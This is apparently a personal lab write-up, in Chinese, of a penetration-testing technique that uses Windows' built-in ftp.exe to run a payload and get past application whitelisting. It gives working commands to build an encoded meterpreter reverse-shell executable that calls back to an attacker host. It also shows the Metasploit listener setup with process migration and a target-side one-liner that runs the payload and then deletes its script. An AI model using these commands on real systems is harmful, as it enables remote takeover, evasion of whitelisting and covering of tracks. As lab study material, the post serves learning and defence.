渗透测试之基于白名单执行payload--Ftp

基于白名单执行payload--Ftp

还是自己动手复现亮神课程的过程。

 

环境 靶机win7

攻击机 kali

 

Ftp.exe简介:

Ftp.exe是Windows本身自带的一个程序,属于微软TP工具,提供基本的FTP访问

说明:Ftp.exe所在路径已被系统添加PATH环境

 


 

 

 

Windows 2003 默认位置:

C:\Windows\System32\ftp.exe

C:\Windows\SysWOW64\ftp.exe

Windows 7 默认位置:

C:\Windows\System32\ftp.exe

C:\Windows\SysWOW64\ftp.exe

 

 

 

 

1、首先攻击机msfvenom生成一个反弹马

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.190.141 LPORT=4444 -f exe > ./1.exe

 

 

 

 

2、然后攻击机kali开启监听模块

注:需设置参数set AutoRunScript migrate -f  (AutoRunScript是msf中一个强大的自动化的后渗透工具,这里migrate参数是迁移木马到其他进程)

 

use exploit/multi/handler/

set payload windows/meterpreter/reverse_tcp

set AutoRunScript migrate -f

set LHOST 192.168.190.141

set LPORT 4444

exploit

 

渗透测试之基于白名单执行payload--Ftp_第1张图片

 

 

 

 

3、靶机通过ftp执行木马

 

echo !C:\1.exe > o &echo quit >> o &ft

p ‐n ‐s:o &del /F /Q o

 

Ps:(>符号是重定向文件,>>是追加文件内容,ftp命令中-n是禁止在初始连接时自动登录,-s是读取并执行有ftp命令的文件,del命令中/F是强制删除,/Q是安静模式,删除时不需要确认)

 

 

 渗透测试之基于白名单执行payload--Ftp_第2张图片

 

渗透测试之基于白名单执行payload--Ftp_第3张图片

 


 

 

这里容易卡死 多试一次即可~

 

posted @ 2019-04-25 21:23 卿先生 阅读(...) 评论(...) 编辑 收藏

你可能感兴趣的:(内网渗透,Web渗透)